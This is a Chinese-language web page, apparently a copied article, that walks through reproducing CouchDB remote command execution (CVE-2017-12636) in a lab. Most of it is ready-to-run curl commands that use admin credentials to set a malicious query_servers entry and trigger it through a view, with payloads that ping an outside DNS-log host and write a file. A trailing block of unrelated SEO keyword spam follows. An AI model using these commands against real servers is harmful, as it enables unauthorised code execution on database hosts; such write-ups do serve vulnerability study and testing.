千家信息网

如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现

发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,这期内容当中小编将会给大家带来有关如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。CouchD
千家信息网最后更新 2025年01月21日如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现

这期内容当中小编将会给大家带来有关如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 "Couch" 是 "Cluster Of Unreliable Commodity Hardware" 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也是如此。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

漏洞影响版本:小于 1.7.0 以及 小于 2.1.1

由于该漏洞利用条件需要登录用户触发,通常配合CVE-2017-12635一起利用

CVE-2017-12635复现文章链接

下面仅作漏洞复现记录与实现,利用流程如下:

1.漏洞环境

目标链接:http://192.168.101.152:5984/

访问链接http://192.168.101.152:5984/_utils/如下

由于Couchdb 2.x和和1.x的的API接口有所差别,导致利用方式也不同,这里演示版本为1.6.0版本

2.漏洞利用

1.6.0漏洞利用:

依次执行以下命令即可触发

其中vulhub:vulhub为管理员的账户密码

curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/_config/query_servers/cmd' -d '"ping test.kfqhkz.dnslog.cn"'

curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest'

curl -X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

curl -X POST 'http://vulhub:vulhub@192.168.101.152:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

执行完毕后查看dnslog

命令执行成功

2.x漏洞利用如下:

Couchdb 2.x 引入了集群,所以修改配置的API需要增加node name。这个其实也简单,我们带上账号密码访问`/_membership`即可:

```
curl http://vulhub:vulhub@your-ip:5984/_membership
```

可见,我们这里只有一个node,名字是`nonode@nohost`。

然后,我们修改`nonode@nohost`的配置:

```
curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'
```

然后,与1.6.0的利用方式相同,我们先增加一个Database和一个Document:

```
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
```

Couchdb 2.x删除了`_temp_view`,所以我们为了触发`query_servers`中定义的命令,需要添加一个`_view`:

```
curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
```

增加`_view`的同时即触发了`query_servers`中的命令。

上述就是小编为大家分享的如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注行业资讯频道。

漏洞 命令 配置 版本 链接 内容 可以通过 密码 文章 方式 目标 分析 管理 运行 不同 相同 中小 内容丰富 只有 可伸缩性 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 北京标准软件开发价格多少 谈谈网络安全法的重要作用 基层公安网络安全 科速互联网络技术有限公司 青浦区智能软件开发管理 天津赞普网络技术有限公司 金蝶专业版服务器不启动 es浏览器可以查服务器的路径吗 武汉国家网络安全培训中心 湖南网络技术开发信息中心 软件开发收费标准上海经信委 管理学网络技术计划法评价 数据库两个表联合查询出错了 服务器找不到磁盘阵列 数据库表id重复 怀旧服联盟服务器推荐2022 网络安全检讨书3000字 手机服务器密码怎么改 宁波数据网络技术服务电话 如何查询华为服务器配置 药学 软件开发 窄带软件开发 桂林美业系统软件开发商 5时代网络安全问题 网络安全教育大事件 视频数据库是什么软件 山东服务器回收平台云主机 服务器怎样输入ip重启 软件开发初始阶段 计算机网络技术实习报告范文
0